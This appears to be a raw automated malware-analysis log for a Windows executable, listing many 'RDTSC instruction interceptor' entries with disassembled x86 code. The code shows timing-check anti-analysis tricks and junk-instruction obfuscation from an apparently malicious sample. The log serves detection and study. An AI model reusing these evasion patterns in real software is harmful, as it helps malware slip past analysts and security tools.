Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E097 second address: C4E0D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F804C8F2D96h 0x00000009 jmp 00007F804C8F2D9Ah 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 mov ecx, dword ptr [ebp+122D1D34h] 0x00000018 push 00000000h 0x0000001a pushad 0x0000001b xor dword ptr [ebp+122D1F20h], esi 0x00000021 mov dword ptr [ebp+122D2B59h], ecx 0x00000027 popad 0x00000028 push AF7C7338h 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jg 00007F804C8F2D96h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E0D2 second address: C4E0D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E0D6 second address: C4E149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 add dword ptr [esp], 50838D48h 0x0000000e clc 0x0000000f pushad 0x00000010 or dword ptr [ebp+122D1EF4h], edi 0x00000016 mov di, ax 0x00000019 popad 0x0000001a push 00000003h 0x0000001c mov dword ptr [ebp+122D1D3Fh], esi 0x00000022 push 00000000h 0x00000024 sub dword ptr [ebp+122D1F20h], edi 0x0000002a push 00000003h 0x0000002c push edx 0x0000002d sub dword ptr [ebp+122D1D39h], ebx 0x00000033 pop edi 0x00000034 call 00007F804C8F2D99h 0x00000039 pushad 0x0000003a jmp 00007F804C8F2DA4h 0x0000003f jmp 00007F804C8F2DA1h 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F804C8F2D9Ch 0x0000004d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E149 second address: C4E15A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804CF71E7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E15A second address: C4E17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c jg 00007F804C8F2D9Ch 0x00000012 pop eax 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E17C second address: C4E181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E181 second address: C4E18F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2D9Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E18F second address: C4E193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E193 second address: C4E1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jnp 00007F804C8F2D96h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E269 second address: C4E288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F804CF71E85h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E288 second address: C4E28E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4E3C4 second address: C4E3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6D3F2 second address: C6D3FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6D70F second address: C6D743 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a jp 00007F804CF71E90h 0x00000010 jmp 00007F804CF71E88h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007F804CF71E76h 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6D9E4 second address: C6DA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F804C8F2DA6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DA03 second address: C6DA17 instructions: 0x00000000 rdtsc 0x00000002 js 00007F804CF71E7Eh 0x00000008 jl 00007F804CF71E76h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DA17 second address: C6DA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DA1B second address: C6DA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DA1F second address: C6DA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DBBF second address: C6DBF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F804CF71E85h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F804CF71E87h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DBF7 second address: C6DBFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DBFB second address: C6DC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DC01 second address: C6DC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6DD6E second address: C6DD82 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F804CF71E76h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F804CF71E76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6E01C second address: C6E032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F804C8F2D96h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jl 00007F804C8F2D96h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6E032 second address: C6E047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F804CF71E76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007F804CF71E76h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6E1B3 second address: C6E1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jne 00007F804C8F2D98h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6E69F second address: C6E6A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6E6A5 second address: C6E6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C3B1C6 second address: C3B1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6F19C second address: C6F1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6F1A0 second address: C6F1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F804CF71E76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6F1AC second address: C6F1B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6F4AF second address: C6F4B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6F4B7 second address: C6F4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C6F4BB second address: C6F4BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C4557C second address: C45585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C45585 second address: C45591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F804CF71E76h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C45591 second address: C45595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C75549 second address: C7554E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C73D25 second address: C73D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804C8F2D9Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C74503 second address: C74508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C74508 second address: C74520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F804C8F2D9Ch 0x00000012 jnc 00007F804C8F2D96h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C74520 second address: C74526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C74526 second address: C7452A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7452A second address: C7452E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C75667 second address: C756AB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 ja 00007F804C8F2D96h 0x0000000d pop edi 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ecx 0x00000014 jmp 00007F804C8F2DA6h 0x00000019 pop ecx 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F804C8F2DA5h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7A1BD second address: C7A1C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F804CF71E76h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7A44B second address: C7A451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7A451 second address: C7A481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F804CF71E7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F804CF71E7Ah 0x00000012 jmp 00007F804CF71E82h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7B3BC second address: C7B3C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7B3C0 second address: C7B3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F804CF71E7Ch 0x0000000c jng 00007F804CF71E76h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7B915 second address: C7B919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7BF89 second address: C7BFB7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F804CF71E78h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d pushad 0x0000000e add edi, dword ptr [ebp+122D22D9h] 0x00000014 sub dword ptr [ebp+122D1D50h], edx 0x0000001a popad 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F804CF71E80h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7C1B2 second address: C7C1B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7C4C0 second address: C7C4C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7C4C4 second address: C7C4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F804C8F2DA2h 0x0000000c jmp 00007F804C8F2D9Bh 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F804C8F2D9Ch 0x0000001c jnp 00007F804C8F2D96h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7C590 second address: C7C5A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804CF71E81h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7C5A5 second address: C7C5DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add dword ptr [ebp+122D188Eh], edx 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F804C8F2DA7h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007F804C8F2D9Ch 0x0000001e jno 00007F804C8F2D96h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7C5DB second address: C7C5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7D51D second address: C7D523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7D523 second address: C7D527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7D395 second address: C7D39B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7D527 second address: C7D54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jbe 00007F804CF71E76h 0x00000011 jmp 00007F804CF71E7Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F804CF71E76h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7D54D second address: C7D551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7E47F second address: C7E484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7E484 second address: C7E489 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7E489 second address: C7E49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F804CF71E76h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7E49A second address: C7E50C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F804C8F2D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c movzx edi, bx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F804C8F2D98h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov si, 051Dh 0x0000002f js 00007F804C8F2D9Bh 0x00000035 or si, 6EA1h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F804C8F2D98h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000016h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D2A37h], eax 0x0000005c xchg eax, ebx 0x0000005d pushad 0x0000005e push eax 0x0000005f push esi 0x00000060 pop esi 0x00000061 pop eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C7E50C second address: C7E510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C804A1 second address: C804A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C804A6 second address: C804BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F804CF71E7Ch 0x00000011 jbe 00007F804CF71E76h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C81AC3 second address: C81ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F804C8F2D96h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C85A4E second address: C85A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C85A54 second address: C85A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C85A58 second address: C85ABF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movzx edi, di 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F804CF71E78h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a add bh, FFFFFF9Eh 0x0000002d cmc 0x0000002e xchg eax, esi 0x0000002f jmp 00007F804CF71E87h 0x00000034 push eax 0x00000035 pushad 0x00000036 push eax 0x00000037 pushad 0x00000038 popad 0x00000039 pop eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F804CF71E7Fh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C88A8F second address: C88A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C86C51 second address: C86C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F804CF71E7Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C88A93 second address: C88AA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F804C8F2D96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C88AA2 second address: C88AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C88AA8 second address: C88AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C8B15A second address: C8B165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Tsy9P2T9yF.exeRDTSC instruction interceptor: First address: C8B165 second address: C8B1F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F804C8F2D98h 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F804C8F2D98h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 js 00007F804C8F2DAFh 0x0000002e jmp 00007F804C8F2DA9h 0x00000033 push 00000000h 0x00000035 movzx ebx, cx 0x00000038 push 00000000h 0x0000003a mov di, ax 0x0000003d jc 00007F804C8F2D9Ch 0x00000043 mov ebx, dword ptr [ebp+122D3845h] 0x00000049 xchg eax, esi 0x0000004a jns 00007F804C8F2DA2h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F804C8F2DA6h 0x00000058 rdtsc
